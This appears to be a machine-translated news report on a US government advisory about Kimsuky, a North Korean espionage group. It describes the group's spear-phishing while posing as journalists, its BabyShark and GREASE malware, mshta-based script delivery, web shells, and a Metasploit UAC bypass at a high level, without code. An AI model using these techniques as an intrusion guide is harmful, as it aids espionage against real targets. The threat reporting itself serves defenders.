The USA issued a warning providing information on hacking team Kimsuky. This is a team that is affiliated with the North Korean government and focuses on gathering information.
The warning was issued by CISAThe FBI and CNMF and says that the hacking team has been active since at least 2012 and uses mainly techniques such as social engineering, spear-phishing and watering hole attacks.
According to warning USA, the Kimsuky team targets individuals and organizations located in Japan, The South Korea And the United States and focuses mainly on gathering information on "foreign policy and national security issues". For this reason, its goals are not accidental. They are individuals from whom he can obtain important information on such matters.
For initial access, Kimsuky uses spear-phishing emails with malicious attachments, as well as various methods social engineering. However, hackers also send some non-malicious ones emails to gain the trust of the victims. Malicious scripts and tools are hosted on services thanks to the use of stolen web hosting credentials.
Kimsuky hackers are presented at victims as South Korean journalists who want to make some interviews on issues concerning Korea. One of the victims, who agreed to do the interview, received a malicious document (in a subsequent email), which infected device of with the BabyShark malware.
Their spear-phishing emails hackers North Korea have adapted to current issues of interest to the target (current COVID-19 crisis, North Korea's nuclear program and media interviews).
After initial access, Kimsuky uses mshta.exe to run an HTML application (HTA) file, which downloads and executes the encoded file BabyShark VBS. The script is able to collect system information and send it to their command and control (C&C) servers hackers.
In 2018, during a campaign known as STOLEN PENCIL, Kimsuky used it GREASE malware, which adds an administrator account Windows and abuses the RDP to provide to the intruders access in breached systems.
Kimsuky aims to gather information Hangul Word Processor (HWP) and Microsoft Office documents and uses it web shells to upload, download and delete files.
In addition, the hackers can gain more privileges on the compromised system by using scripts placed in the Startup folder, new services, and malicious code inserted into explorer.exe For example, the Win7Elevate exploit from the Metasploit framework was used to bypass User Account Control and enter malicious code into explorer.exe.
According to Securityweek, CISA and FBI They also talked about the methods that Kimsuky uses for avoid defense mechanisms, The use various tools to collect credentials And the attacks on macOS systems.
Finally, the warning emphasizes that Kimsuky's activities limited to collection of information and are not destructive.